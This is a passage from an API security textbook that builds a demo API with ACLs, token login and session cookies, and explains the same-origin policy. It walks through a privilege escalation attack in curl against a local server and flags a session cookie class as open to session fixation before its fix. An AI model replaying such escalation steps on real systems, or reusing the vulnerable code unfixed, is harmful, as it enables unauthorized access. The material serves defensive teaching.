listing 3.9 to the class. First, validate that the permissions given match the rwd form
that you’ve been using. You can do this using a regular expression. If so, then insert
the permissions for that user into the permissions ACL table in the database.
public JSONObject addMember(Request request, Response response) {
var json = new JSONObject(request.body());
var spaceId = Long.parseLong(request.params(":spaceId"));
var userToAdd = json.getString("username");
var perms = json.getString("permissions");
if (!perms.matches("r?w?d?")) {
throw new IllegalArgumentException("invalid permissions");
}
database.updateUnique(
"INSERT INTO permissions(space_id, user_id, perms) " +
"VALUES(?, ?, ?);", spaceId, userToAdd, perms);
response.status(200);
return new JSONObject()
.put("username", userToAdd)
.put("permissions", perms);
}
You can then add a new route to your main method to allow adding a new member by
POSTing to /spaces/:spaceId/members. Open Main.java in your editor again and
add the following new route and access control filter to the main method underneath
the existing routes:
before("/spaces/:spaceId/members",
userController.requirePermission("POST", "r"));
post("/spaces/:spaceId/members", spaceController::addMember);
Listing 3.9
Adding users to a space
Ensure the permissions
granted are valid.
Update the permissions for the
user in the access control list.
95
Access control
You can test this by adding the demo2 user to the space and letting them read messages:
$ curl -u demo:password
➥ -H ‘Content-Type: application/json’
➥ -d ‘{"username":"demo2","permissions":"r"}’
➥ https://localhost:4567/spaces/1/members
{"permissions":"r","username":"demo2"}
$ curl -u demo2:password
➥ https://localhost:4567/spaces/1/messages/1
{"author":"demo","time":"2019-02-06T15:15:03.138Z","message":"Hello,
World!","uri":"/spaces/1/messages/1"}
3.6.5
Avoiding privilege escalation attacks
It turns out that the demo2 user you just added can do a bit more than just read mes-
sages. The permissions on the addMember method allow any user with read access to
add new users to the space and they can choose the permissions for the new user. So
demo2 can simply create a new account for themselves and grant it more permissions
than you originally gave them, as shown in the following example.
First, they create the new user:
$ curl -H ‘Content-Type: application/json’
➥ -d ‘{"username":"evildemo2","password":"password"}’
➥ https://localhost:4567/users
➥ {"username":"evildemo2"}
They then add that user to the space with full permissions:
$ curl -u demo2:password
➥ -H ‘Content-Type: application/json’
➥ -d ‘{"username":"evildemo2","permissions":"rwd"}’
➥ https://localhost:4567/spaces/1/members
{"permissions":"rwd","username":"evildemo2"}
They can now do whatever they like, including deleting your messages:
$ curl -i -X DELETE -u evildemo2:password
➥ https://localhost:4567/spaces/1/messages/1
HTTP/1.1 200 OK
...
What happened here is that although the demo2 user was only granted read permis-
sion on the space, they could then use that read permission to add a new user that has
full permissions on the space. This is known as a privilege escalation, where a user with
lower privileges can exploit a bug to give themselves higher privileges.
DEFINITION
A privilege escalation (or elevation of privilege) occurs when a user
with limited permissions can exploit a bug in the system to grant themselves
or somebody else more permissions than they have been granted.
96
CHAPTER 3
Securing the Natter API
You can fix this in two general ways:
1
You can require that the permissions granted to the new user are no more than
the permissions that are granted to the existing user. That is, you should ensure
that evildemo2 is only granted the same access as the demo2 user.
2
You can require that only users with all permissions can add other users.
For simplicity you’ll implement the second option and change the authorization filter
on the addMember operation to require all permissions. Effectively, this means that
only the owner or other moderators can add new members to a social space.
Open the Main.java file and locate the before filter that grants access to add users
to a social space. Change the permissions required from r to rwd as follows:
before("/spaces/:spaceId/members",
userController.requirePermission("POST", "rwd"));
If you retry the attack with demo2 again you’ll find that they are no longer able to cre-
ate any users, let alone one with elevated privileges.
Answers to pop quiz questions
1
c. Rate-limiting should be enforced as early as possible to minimize the resources
used in processing requests.
2
b. The Retry-After header tells the client how long to wait before retrying
requests.
3
d, e, and f. A secure password hashing algorithm should use a lot of CPU and
memory to make it harder for an attacker to carry out brute-force and dictio-
nary attacks. It should use a random salt for each password to prevent an
attacker pre-computing tables of common password hashes.
4
e. HTTP Basic credentials are only Base64-encoded, which as you’ll recall from
section 3.3.1, are easy to decode to reveal the password.
5
c. TLS provides no availability protections on its own.
Pop quiz
7
Which HTTP status code indicates that the user doesn’t have permission to
access a resource (rather than not being authenticated)?
a
403 Forbidden
b
404 Not Found
c
401 Unauthorized
d
418 I’m a Teapot
e
405 Method Not Allowed
The answer is at the end of the chapter.
97
Summary
6
d. The principle of separation of duties.
7
a. 403 Forbidden. As you’ll recall from the start of section 3.6, despite the
name, 401 Unauthorized means only that the user is not authenticated.
Summary
Use threat-modelling with STRIDE to identify threats to your API. Select appro-
priate security controls for each type of threat.
Apply rate-limiting to mitigate DoS attacks. Rate limits are best enforced in a
load balancer or reverse proxy but can also be applied per-server for defense
in depth.
Enable HTTPS for all API communications to ensure confidentiality and integ-
rity of requests and responses. Add HSTS headers to tell web browser clients to
always use HTTPS.
Use authentication to identify users and prevent spoofing attacks. Use a secure
password-hashing scheme like Scrypt to store user passwords.
All significant operations on the system should be recorded in an audit log,
including details of who performed the action, when, and whether it was
successful.
Enforce access control after authentication. ACLs are a simple approach to
enforcing permissions.
Avoid privilege escalation attacks by considering carefully which users can grant
permissions to other users.
Part 2
Token-based authentication
Token-based authentication is the dominant approach to securing APIs,
with a wide variety of techniques and approaches. Each approach has different
trade-offs and are suitable in different scenarios. In this part of the book, you’ll
examine the most commonly used approaches.
Chapter 4 covers traditional session cookies for first-party browser-based apps
and shows how to adapt traditional web application security techniques for use
in APIs.
Chapter 5 looks at token-based authentication without cookies using the
standard Bearer authentication scheme. The focus in this chapter is on building
APIs that can be accessed from other sites and from mobile or desktop apps.
Chapter 6 discusses self-contained token formats such as JSON Web Tokens.
You’ll see how to protect tokens from tampering using message authentication
codes and encryption, and how to handle logout.
101
Session cookie
authentication
So far, you have required API clients to submit a username and password on every
API request to enforce authentication. Although simple, this approach has several
downsides from both a security and usability point of view. In this chapter, you’ll
learn about those downsides and implement an alternative known as token-based
authentication, where the username and password are supplied once to a dedicated
login endpoint. A time-limited token is then issued to the client that can be used in
place of the user’s credentials for subsequent API calls. You will extend the Natter
API with a login endpoint and simple session cookies and learn how to protect
those against Cross-Site Request Forgery (CSRF) and other attacks. The focus of
this chapter is authentication of browser-based clients hosted on the same site as
the API. Chapter 5 covers techniques for clients on other domains and non-
browser clients such as mobile apps.
This chapter covers
Building a simple web-based client and UI
Implementing token-based authentication
Using session cookies in an API
Preventing cross-site request forgery attacks
102
CHAPTER 4
Session cookie authentication
DEFINITION
In token-based authentication, a user’s real credentials are pre-
sented once, and the client is then given a short-lived token. A token is typically
a short, random string that can be used to authenticate API calls until the
token expires.
4.1
Authentication in web browsers
In chapter 3, you learned about HTTP Basic authentication, in which the username and
password are encoded and sent in an HTTP Authorization header. An API on its own is
not very user friendly, so you’ll usually implement a user interface (UI) on top. Imagine
that you are creating a UI for Natter that will use the API under the hood but create a
compelling web-based user experience on top. In a web browser, you’d use web technol-
ogies such as HTML, CSS, and JavaScript. This isn’t a book about UI design, so you’re
not going to spend a lot of time creating a fancy UI, but an API that must serve web
browser clients cannot ignore UI issues entirely. In this first section, you’ll create a very
simple UI to talk to the Natter API to see how the browser interacts with HTTP Basic
authentication and some of the drawbacks of that approach. You’ll then develop a more
web-friendly alternative authentication mechanism later in the chapter. Figure 4.1 shows
the rendered HTML page in a browser. It’s not going to win any awards for style, but it
gets the job done. For a more in-depth treatment of the nuts and bolts of building UIs
in JavaScript, there are many good books available, such as Michael S. Mikowski and
Josh C. Powell’s excellent Single Page Web Applications (Manning, 2014).
4.1.1
Calling the Natter API from JavaScript
Because your API requires JSON requests, which aren’t supported by standard HTML
form controls, you need to make calls to the API with JavaScript code, using either the
older XMLHttpRequest object or the newer Fetch API in the browser. You’ll use the
Fetch interface in this example because it is much simpler and already widely sup-
ported by browsers. Listing 4.1 shows a simple JavaScript client for calling the Natter
API createSpace operation from within a browser. The createSpace function takes
the name of the space and the owner as arguments and calls the Natter REST API
using the browser Fetch API. The name and owner are combined into a JSON body,
and you should specify the correct Content-Type header so that the Natter API doesn’t
Figure 4.1
A simple web UI
for creating a social space
with the Natter API
103
Authentication in web browsers
reject the request. The fetch call sets the credentials attribute to include, to ensure
that HTTP Basic credentials are set on the request; otherwise, they would not be, and
the request would fail to authenticate.
To access the API, create a new folder named public in the Natter project, under-
neath the src/main/resources folder. Inside that new folder, create a new file called
natter.js in your text editor and enter the code from listing 4.1 and save the file. The
new file should appear in the project under src/main/resources/public/natter.js.
const apiUrl = 'https://localhost:4567';
function createSpace(name, owner) {
let data = {name: name, owner: owner};
fetch(apiUrl + '/spaces', {
method: 'POST',
credentials: 'include',
body: JSON.stringify(data),
headers: {
'Content-Type': 'application/json'
}
})
.then(response => {
if (response.ok) {
return response.json();
} else {
throw Error(response.statusText);
}
})
.then(json => console.log('Created space: ', json.name, json.uri))
.catch(error => console.error('Error: ', error));}
The Fetch API is designed to be asynchronous, so rather than returning the result of
the REST call directly it instead returns a Promise object, which can be used to regis-
ter functions to be called when the operation completes. You don’t need to worry
about the details of that for this example, but just be aware that everything within the
.then(response => . . . ) section is executed if the request completed successfully,
whereas everything in the .catch(error => . . . ) section is executed if a network
error occurs. If the request succeeds, then parse the response as JSON and log the
details to the JavaScript console. Otherwise, any error is also logged to the console.
The response.ok field indicates whether the HTTP status code was in the range 200–
299, because these indicate successful responses in HTTP.
Create a new file called natter.html under src/main/resources/public, alongside
the natter.js file you just created. Copy in the HTML from listing 4.2, and click Save.
The HTML includes the natter.js script you just created and displays the simple
HTML form with fields for typing the space name and owner of the new space to be
created. You can style the form with CSS if you want to make it a bit less ugly. The CSS
Listing 4.1
Calling the Natter API from JavaScript
Use the Fetch API to call
the Natter API endpoint.
Pass the request data as
JSON with the correct
Content-Type.
Parse the response
JSON or throw an error
if unsuccessful.
104
CHAPTER 4
Session cookie authentication
in the listing just ensures that each form field is on a new line by filling up all remain-
ing space with a large margin.
<!DOCTYPE html>
<html>
<head>
<title>Natter!</title>
<script type="text/javascript" src="natter.js"></script>
<style type="text/css">
input { margin-right: 100% }
</style>
</head>
<body>
<h2>Create Space</h2>
<form id="createSpace">
<label>Space name: <input name="spaceName" type="text"
id="spaceName">
</label>
<label>Owner: <input name="owner" type="text" id="owner">
</label>
<button type="submit">Create</button>
</form>
</body>
</html>
4.1.2
Intercepting form submission
Because web browsers do not know how to submit JSON to a REST API, you need to
instruct the browser to call your createSpace function when the form is submitted
instead of its default behavior. To do this, you can add more JavaScript to intercept
the submit event for the form and call the function. You also need to suppress the
default behavior to prevent the browser trying to directly submit the form to the server.
Listing 4.3 shows the code to implement this. Open the natter.js file you created ear-
lier in your text editor and copy the code from the listing into the file after the exist-
ing createSpace function.
The code in the listing first registers a handler for the load event on the window
object, which will be called after the document has finished loading. Inside that event
handler, it then finds the form element and registers a new handler to be called when
the form is submitted. The form submission handler first suppresses the browser
default behavior, by calling the .preventDefault() method on the event object, and
then calls your createSpace function with the values from the form. Finally, the func-
tion returns false to prevent the event being further processed.
window.addEventListener('load', function(e) {
document.getElementById('createSpace')
.addEventListener('submit', processFormSubmit);
});
Listing 4.2
The Natter UI HTML
Listing 4.3
Intercepting the form submission
Include the
natter.js script
file.
Style the form as
you wish using CSS.
The HTML form has an ID
and some simple fields.
When the document
loads, add an event
listener to intercept
the form submission.
105
Authentication in web browsers
function processFormSubmit(e) {
e.preventDefault();
let spaceName = document.getElementById('spaceName').value;
let owner = document.getElementById('owner').value;
createSpace(spaceName, owner);
return false;
}
4.1.3
Serving the HTML from the same origin
If you try to load the HTML file directly in your web browser from the file system to try
it out, you’ll find that nothing happens when you click the submit button. If you open
the JavaScript Console in your browser (from the View menu in Chrome, select Devel-
oper and then JavaScript Console), you’ll see an error message like that shown in fig-
ure 4.2. The request to the Natter API was blocked because the file was loaded from a
URL that looks like file:/ / /Users/neil/natter-api/src/main/resources/public/natter
.api, but the API is being served from a server on https:/ /localhost:4567/.
By default, browsers allow JavaScript to send HTTP requests only to a server on the
same origin that the script was loaded from. This is known as the same-origin policy
(SOP) and is an important cornerstone of web browser security. To the browser, a file
URL and an HTTPS URL are always on different origins, so it will block the request.
In chapter 5, you’ll see how to fix this with cross-origin resource sharing (CORS), but
for now let’s get Spark to serve the UI from the same origin as the Natter API.
DEFINITION
The origin of a URL is the combination of the protocol, host, and
port components of the URL. If no port is specified in the URL, then a
default port is used for the protocol. For HTTP the default port is 80, while
for HTTPS it is 443. For example, the origin of the URL https://www.google
.com/search has protocol = https, host = www.google.com, and port = 443.
Two URLs have the same origin if the protocol, host, and port all exactly
match each other.
Suppress the default
form behavior.
Call our API function with
values from the form.
Figure 4.2
An error message in the JavaScript console when loading the HTML page directly. The request was
blocked because the local file is considered to be on a separate origin to the API, so browsers will block the
request by default.
106
CHAPTER 4
Session cookie authentication
To instruct Spark to serve your HTML and JavaScript files, you add a staticFiles
directive to the main method where you have configured the API routes. Open
Main.java in your text editor and add the following line to the main method. It must
come before any other route definitions, so put it right at the start of the main
method as the very first line:
Spark.staticFiles.location("/public");
The same-origin policy
The same-origin policy (SOP) is applied by web browsers to decide whether to allow
a page or script loaded from one origin to interact with other resources. It applies
when other resources are embedded within a page, such as by HTML <img> or
<script> tags, and when network requests are made through form submissions or
by JavaScript. Requests to the same origin are always allowed, but requests to a dif-
ferent origin, known as cross-origin requests, are often blocked based on the policy.
The SOP can be surprising and confusing at times, but it is a critical part of web secu-
rity so it’s worth getting familiar with as an API developer. Many browser APIs avail-
able to JavaScript are also restricted by origin, such as access to the HTML document
itself (via the document object model, or DOM), local data storage, and cookies. The
Mozilla Developer Network has an excellent article on the SOP at https://developer
.mozilla.org/en-US/docs/Web/Security/Same-origin_policy.
Broadly speaking, the SOP will allow many requests to be sent from one origin to
another, but it will stop the initiating origin from being able to read the response.
For example, if a JavaScript loaded from https:/ /www .alice.com makes a POST
request to http:/ /bob.net, then the request will be allowed (subject to the condi-
tions described below), but the script will not be able to read the response or even
see if it was successful. Embedding a resource using a HTML tag such as <img>,
<video>, or <script> is generally allowed, and in some cases, this can reveal
some information about the cross-origin response to a script, such as whether the
resource exists or its size.
Only certain HTTP requests are permitted cross-origin by default, and other requests
will be blocked completely. Allowed requests must be either a GET, POST, or HEAD
request and can contain only a small number of allowed headers on the request, such
as Accept and Accept-Language headers for content and language negotiation. A
Content-Type header is allowed, but only three simple values are allowed:
application/x-www-form-urlencoded
multipart/form-data
text/plain
These are the same three content types that can be produced by an HTML form ele-
ment. Any deviation from these rules will result in the request being blocked. Cross-
origin resource sharing (CORS) can be used to relax these restrictions, as you’ll learn
in chapter 5.
107
Authentication in web browsers
This instructs Spark to serve any files that it finds in the src/main/java/resources/
public folder.
TIP
Static files are copied during the Maven compilation process, so you will
need to rebuild and restart the API using mvn clean compile exec:java to
pick up any changes to these files.
Once you have configured Spark and restarted the API server, you will be able to
access the UI from https:/ /localhost:4567/natter.html. Type in any value for the new
space name and owner and then click the Submit button. Depending on your browser,
you will be presented with a screen like that shown in figure 4.3 prompting you for a
username and password.
So, where did this come from? Because your JavaScript client did not supply a user-
name and password on the REST API request, the API responded with a standard
HTTP 401 Unauthorized status and a WWW-Authenticate header prompting for
authentication using the Basic scheme. The browser understands the Basic authenti-
cation scheme, so it pops up a dialog box automatically to prompt the user for a user-
name and password.
Create a user with the same name as the space owner using curl at the command
line if you have not already created one, by running:
curl -H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}'\
https://localhost:4567/users
and then type in the name and password to the box, and click Sign In. If you check
the JavaScript Console you will see that the space has now been created.
Figure 4.3
Chrome prompt for username and password produced automatically
when the API asks for HTTP Basic authentication
108
CHAPTER 4
Session cookie authentication
If you now create another space, you will see that the browser doesn’t prompt for the
password again but that the space is still created. Browsers remember HTTP Basic cre-
dentials and automatically send them on subsequent requests to the same URL path
and to other endpoints on the same host and port that are siblings of the original URL.
That is, if the password was originally sent to https:/ /api.example.com:4567/a/b/c,
then the browser will send the same credentials on requests to https:/ /api.example.com
:4567/a/b/d, but would not send them on a request to https:/ /api.example.com:4567/a
or other endpoints.
4.1.4
Drawbacks of HTTP authentication
Now that you’ve implemented a simple UI for the Natter API using HTTP Basic
authentication, it should be apparent that it has several drawbacks from both a user
experience and engineering point of view. Some of the drawbacks include the
following:
The user’s password is sent on every API call, increasing the chance of it acci-
dentally being exposed by a bug in one of those operations. If you are imple-
menting a microservice architecture (covered in chapter 10), then every
microservice needs to securely handle those passwords.
Verifying a password is an expensive operation, as you saw in chapter 3, and
performing this validation on every API call adds a lot of overhead. Modern
password-hashing algorithms are designed to take around 100ms for interac-
tive logins, which limits your API to handling 10 operations per CPU core per
second. You’re going to need a lot of CPU cores if you need to scale up with
this design!
The dialog box presented by browsers for HTTP Basic authentication is pretty
ugly, with not much scope for customization. The user experience leaves a lot to
be desired.
There is no obvious way for the user to ask the browser to forget the password.
Even closing the browser window may not work and it often requires configur-
ing advanced settings or completely restarting the browser. On a public termi-
nal, this is a serious security problem if the next user can visit pages using your
stored password just by clicking the Back button.
For these reasons, HTTP Basic authentication and other standard HTTP auth
schemes (see sidebar) are not often used for APIs that must be accessed from web
browser clients. On the other hand, HTTP Basic authentication is a simple solution
for APIs that are called from command-line utilities and scripts, such as system admin-
istrator APIs, and has a place in service-to-service API calls that are covered in part 4,
where no user is involved at all and passwords can be assumed to be strong.
109
Token-based authentication
4.2
Token-based authentication
Let’s suppose that your users are complaining about the drawbacks of HTTP Basic
authentication in your API and want a better authentication experience. The CPU
overhead of all this password hashing on every request is killing performance and
driving up energy costs too. What you want is a way for users to login once and then be
trusted for the next hour or so while they use the API. This is the purpose of token-
based authentication, and in the form of session cookies has been a backbone of web
development since very early on. When a user logs in by presenting their username
and password, the API will generate a random string (the token) and give it to the cli-
ent. The client then presents the token on each subsequent request, and the API can
look up the token in a database on the server to see which user is associated with that
HTTP Digest and other authentication schemes
HTTP Basic authentication is just one of several authentication schemes that are sup-
ported by HTTP. The most common alternative is HTTP Digest authentication, which
sends a salted hash of the password instead of sending the raw value. Although this
sounds like a security improvement, the hashing algorithm used by HTTP Digest,
MD5, is considered insecure by modern standards and the widespread adoption of
HTTPS has largely eliminated its advantages. Certain design choices in HTTP Digest
also prevent the server from storing the password more securely, because the weakly-
hashed value must be available. An attacker who compromises the database there-
fore has a much easier job than they would if a more secure algorithm had been used.
If that wasn’t enough, there are several incompatible variants of HTTP Digest in use.
You should avoid HTTP Digest authentication in new applications.
While there are a few other HTTP authentication schemes, most are not widely used.
The exception is the more recent HTTP Bearer authentication scheme introduced by
OAuth2 in RFC 6750 (https://tools.ietf.org/html/rfc6750). This is a flexible token-
based authentication scheme that is becoming widely used for API authentication.
HTTP Bearer authentication is discussed in detail in chapters 5, 6, and 7.
Pop quiz
1
Given a request to an API at https:/ /api.example.com:8443/test/1, which of
the following URIs would be running on the same origin according to the same-
origin policy?
a
http:/ /api.example.com/test/1
b
https:/ /api.example.com/test/2
c
http:/ /api.example.com:8443/test/2
d
https:/ /api.example.com:8443/test/2
e
https:/ /www .example.com:8443/test/2
The answer is at the end of the chapter.
110
CHAPTER 4
Session cookie authentication
session. When the user logs out, or the token expires, it is deleted from the database,
and the user must log in again if they want to keep using the API.
NOTE
Some people use the term token-based authentication only when referring
to non-cookie tokens covered in chapter 5. Others are even more exclusive
and only consider the self-contained token formats of chapter 6 to be real
tokens.
To switch to token-based authentication, you’ll introduce a dedicated new login end-
point. This endpoint could be a new route within an existing API or a brand-new API
running as its own microservice. If your login requirements are more complicated,
you might want to consider using an authentication service from an open source or
commercial vendor; but for now, you’ll just hand-roll a simple solution using user-
name and password authentication as before.
Token-based authentication is a little more complicated than the HTTP Basic
authentication you have used so far, but the basic flow, shown in figure 4.4, is quite
simple. Rather than send the username and password directly to each API endpoint,
the client instead sends them to a dedicated login endpoint. The login endpoint veri-
fies the username and password and then issues a time-limited token. The client then
includes that token on subsequent API requests to authenticate. The API endpoint
Login (username, password)
Token
The client calls a dedicated
login endpoint rather than
sending credentials on
every request.
The login endpoint returns a
time-limited token to the client . . .
Token store
Token
The client includes the token
on subsequent requests.
The API server can look up the
token in the database to check
if the client is authenticated.
. . . and stores the token
in a database.
API server
Client
Client
API server
Figure 4.4
In token-based authentication, the client first makes a request to a dedicated
login endpoint with the user’s credentials. In response, the login endpoint returns a time-
limited token. The client then sends that token on requests to other API endpoints that
use it to authenticate the user. API endpoints can validate the token by looking it up in
the token database.
111
Token-based authentication
can validate the token because it is able to talk to a token store that is shared between
the login endpoint and the API endpoint.
In the simplest case, this token store is a shared database indexed by the token ID,
but more advanced (and loosely coupled) solutions are also possible, as you’ll see in
chapter 6. A short-lived token that is intended to authenticate a user while they are
directly interacting with a site (or API) is often referred to as a session token, session
cookie, or just session.
For web browser clients, there are several ways you can store the token on the cli-
ent. Traditionally, the only option was to store the token in an HTTP cookie, which
the browser remembers and sends on subsequent requests to the same site until the
cookie expires or is deleted. You’ll implement cookie-based storage in the rest of this
chapter and learn how to protect cookies against common attacks. Cookies are still a
great choice for first-party clients running on the same origin as the API they are talking
to but can be difficult when dealing with third-party clients and clients hosted on other
domains. In chapter 5, you will implement an alternative to cookies using HTML 5
local storage that solves these problems, but with new challenges of its own.
DEFINITION
A first-party client is a client developed by the same organization
or company that develops an API, such as a web application or mobile app.
Third-party clients are developed by other companies and are usually less
trusted.
4.2.1
A token store abstraction
In this chapter and the next two, you’re going to implement several storage options
for tokens with different pros and cons, so let’s create an interface now that will let
you easily swap out one solution for another. Figure 4.5 shows the TokenStore inter-
face and its associated Token class as a UML class diagram. Each token has an associ-
ated username and an expiry time, and a collection of attributes that you can use to
associate information with the token, such as how the user was authenticated or other
details that you want to use to make access control decisions. Creating a token in the
store returns its ID, allowing different store implementations to decide how the token
should be named. You can later look up a token by ID, and you can use the Optional
+ username : String
+ expiry : Instant
+ attributes : Map<String, String>
Token
+ create(token: Token): String
+ read(tokenId: String): Optional<Token>
<<interface>>
TokenStore
1
0..*
Figure 4.5
A token store has operations to create a token, returning its ID, and to look
up a token by ID. A token itself has an associated username, an expiry time, and a set
of attributes.
112
CHAPTER 4
Session cookie authentication
class to handle the fact that the token might not exist; either because the user passed
an invalid ID in the request or because the token has expired.
The code to create the TokenStore interface and Token class is given in listing 4.4.
As in the UML diagram, there are just two operations in the TokenStore interface for
now. One is for creating a new token, and another is for reading a token given its ID.
You’ll add another method to revoke tokens in section 4.6. For simplicity and concise-
ness, you can use public fields for the attributes of the token. Because you’ll be writing
more than one implementation of this interface, let’s create a new package to hold
them. Navigate to src/main/java/com/manning/apisecurityinaction and create a
new folder named “token”. In your text editor, create a new file TokenStore.java in the
new folder and copy the contents of listing 4.4 into the file, and click Save.
package com.manning.apisecurityinaction.token;
import java.time.*;
import java.util.*;
import java.util.concurrent.*;
import spark.Request;
public interface TokenStore {
String create(Request request, Token token);
Optional<Token> read(Request request, String tokenId);
class Token {
public final Instant expiry;
public final String username;
public final Map<String, String> attributes;
public Token(Instant expiry, String username) {
this.expiry = expiry;
this.username = username;
this.attributes = new ConcurrentHashMap<>();
}
}
}
In section 4.3, you’ll implement a token store based on session cookies, using Spark’s
built-in cookie support. Then in chapters 5 and 6 you’ll see more advanced imple-
mentations using databases and encrypted client-side tokens for high scalability.
4.2.2
Implementing token-based login
Now that you have an abstract token store, you can write a login endpoint that uses
the store. Of course, it won’t work until you implement a real token store backend,
but you’ll get to that soon in section 4.3.
Listing 4.4
The TokenStore abstraction
A token can be
created and then
later looked up
by token ID.
A token has an expiry time,
an associated username,
and a set of attributes.
Use a concurrent map if
the token will be accessed
from multiple threads.
113
Token-based authentication
As you’ve already implemented HTTP Basic authentication, you can reuse that
functionality to implement token-based login. By registering a new login endpoint
and marking it as requiring authentication, using the existing UserController filter,
the client will be forced to authenticate with HTTP Basic to call the new login end-
point. The user controller will take care of validating the password, so all our new
endpoint must do is look up the subject attribute in the request and construct a token
based on that information, as shown in figure 4.6.
The ability to reuse the existing HTTP Basic authentication mechanism makes the
implementation of the login endpoint very simple, as shown in listing 4.5. To implement
token-based login, navigate to src/main/java/com/manning/apisecurityinaction/
controller and create a new file TokenController.java. The new controller should
take a TokenStore implementation as a constructor argument. This will allow you to
swap out the token storage backend without altering the controller implementation.
As the actual authentication of the user will be taken care of by the existing User-
Controller, all the TokenController needs to do is pull the authenticated user sub-
ject out of the request attributes (where it was set by the UserController) and create
a new token using the TokenStore. You can set whatever expiry time you want for the
tokens, and this will control how frequently the user will be forced to reauthenticate.
In this example it’s hard-coded to 10 minutes for demonstration purposes. Copy the
contents of listing 4.5 into the new TokenController.java file, and click Save.
Login endpoint
User controller
Password
database
Request
Authenticate user
with HTTP Basic.
If Basic auth succeeds,
then proceed to token
login endpoint.
If Basic auth fails,
then request is rejected.
Token store
Figure 4.6
The user controller authenticates the user with HTTP Basic
authentication as before. If that succeeds, then the request continues to the
token login endpoint, which can retrieve the authenticated subject from the
request attributes. Otherwise, the request is rejected because the endpoint
requires authentication.
114
CHAPTER 4
Session cookie authentication
package com.manning.apisecurityinaction.controller;
import java.time.temporal.ChronoUnit;
import org.json.JSONObject;
import com.manning.apisecurityinaction.token.TokenStore;
import spark.*;
import static java.time.Instant.now;
public class TokenController {
private final TokenStore tokenStore;
public TokenController(TokenStore tokenStore) {
this.tokenStore = tokenStore;
}
public JSONObject login(Request request, Response response) {
String subject = request.attribute("subject");
var expiry = now().plus(10, ChronoUnit.MINUTES);
var token = new TokenStore.Token(expiry, subject);
var tokenId = tokenStore.create(request, token);
response.status(201);
return new JSONObject()
.put("token", tokenId);
}
}
You can now wire up the TokenController as a new endpoint that clients can call to
login and get a session token. To ensure that users have authenticated using the User-
Controller before they hit the TokenController login endpoint, you should add the
new endpoint after the existing authentication filters. Given that logging in is an
important action from a security point of view, you should also make sure that calls to
the login endpoint are logged by the AuditController as for other endpoints. To add
the new login endpoint, open the Main.java file in your editor and add lines to create
a new TokenController and expose it as a new endpoint, as in listing 4.6. Because you
don’t yet have a real TokenStore implementation, you can pass a null value to the
TokenController for now. Rather than have a /login endpoint, we’ll treat session
tokens as a resource and treat logging in as creating a new session resource. There-
fore, you should register the TokenController login method as the handler for a POST
request to a new /sessions endpoint. Later, you will implement logout as a DELETE
request to the same endpoint.
Listing 4.5
Token-based login
Inject the token store
as a constructor
argument.
Extract
the subject
username from
the request and
pick a suitable
expiry time.
Create the token
in the store and
return the token
ID in the response.
115
Session cookies
TokenStore tokenStore = null;
var tokenController = new TokenController(tokenStore);
before(userController::authenticate);
var auditController = new AuditController(database);
before(auditController::auditRequestStart);
afterAfter(auditController::auditRequestEnd);
before("/sessions", userController::requireAuthentication);
post("/sessions", tokenController::login);
Once you’ve added the code to wire up the TokenController, it’s time to write a real
implementation of the TokenStore interface. Save the Main.java file, but don’t try to
test it yet because it will fail.
4.3
Session cookies
The simplest implementation of token-based authentication, and one that is widely
implemented on almost every website, is cookie-based. After the user authenticates,
the login endpoint returns a Set-Cookie header on the response that instructs the
web browser to store a random session token in the cookie storage. Subsequent
requests to the same site will include the token as a Cookie header. The server can
then look up the cookie token in a database to see which user is associated with that
token, as shown in figure 4.7.
Listing 4.6
The login endpoint
Are cookies RESTful?
One of the key principles of the REST architectural style is that interactions between
the client and the server should be stateless. That is, the server should not store any
client-specific state between requests. Cookies appear to violate this principle
because the server stores state associated with the cookie for each client. Early uses
of session cookies included using them as a place to store temporary state such as
a shopping cart of items that have been selected by the user but not yet paid for.
These abuses of cookies often broke expected behavior of web pages, such as the
behavior of the back button or causing a URL to display differently for one user com-
pared to another.
When used purely to indicate the login state of a user at an API, session cookies are
a relatively benign violation of the REST principles, and they have many security attri-
butes that are lost when using other technologies. For example, cookies are associ-
ated with a domain, so the browser ensures that they are not accidentally sent to
other sites. They can also be marked as Secure, which prevents the cookie being acci-
dentally sent over a non-HTTPS connection where it might be intercepted. I therefore
Create the new
TokenController,
at first with a null
TokenStore.
Ensure the user is authenticated
by the UserController first.
Calls to the login endpoint
should be logged, so make
sure that also happens first.
Reject unauthenticated
requests before the
login endpoint can be
accessed.
116
CHAPTER 4
Session cookie authentication
Cookie-based sessions are so widespread that almost every web framework for any lan-
guage has built-in support for creating such session cookies, and Spark is no excep-
tion. In this section you’ll build a TokenStore implementation based on Spark’s
session cookie support. To access the session associated with a request, you can use the
request.session() method:
Session session = request.session(true);
Spark will check to see if a session cookie is present on the request, and if so, it will
look up any state associated with that session in its internal database. The single boolean
argument indicates whether you would like Spark to create a new session if one does
(continued)
think that cookies still have an important role to play for APIs that are designed to
serve browser-based clients served from the same origin as the API. In chapter 6,
you’ll learn about alternatives to cookies that do not require the server to maintain
any per-client state, and in chapter 9, you’ll learn how to use capability URIs for a
more RESTful solution.
Web server
Web browser
client
Login
Set-Cookie: SESSID=XyZ...
Web server
Web browser
client
POST /spaces/...
Cookie: SESSID=XyZ...
When the user logs in,
the server responds with
a Set-Cookie header.
On subsequent requests,
the browser sends the session
token as a Cookie header.
Token
store
Token
store
Figure 4.7
In session cookie authentication, after the user logs in the server
sends a Set-Cookie header on the response with a random session token. On
subsequent requests to the same server, the browser will send the session token
back in a Cookie header, which the server can then look up in the token store to
access the session state.
117
Session cookies
not yet exist. To create a new session, you pass a true value, in which case Spark will
generate a new session token and store it in its database. It will then add a Set-Cookie
header to the response. If you pass a false value, then Spark will return null if there
is no Cookie header on the request with a valid session token.
Because we can reuse the functionality of Spark’s built-in session management,
the implementation of the cookie-based token store is almost trivial, as shown in list-
ing 4.7. To create a new token, you can simply create a new session associated with the
request and then store the token attributes as attributes of the session. Spark will take
care of storing these attributes in its session database and setting the appropriate Set-
Cookie header. To read tokens, you can just check to see if a session is associated with
the request, and if so, populate the Token object from the attributes on the session.
Again, Spark takes care of checking if the request has a valid session Cookie header
and looking up the attributes in its session database. If there is no valid session cookie
associated with the request, then Spark will return a null session object, which you
can then return as an Optional.empty()value to indicate that no token is associated
with this request.
To create the cookie-based token store, navigate to src/main/java/com/manning/
apisecurityinaction/token and create a new file named CookieTokenStore.java. Type
in the contents of listing 4.7, and click Save.
WARNING
This code suffers from a vulnerability known as session fixation.
You’ll fix that shortly in section 4.3.1.
package com.manning.apisecurityinaction.token;
import java.util.Optional;
import spark.Request;
public class CookieTokenStore implements TokenStore {
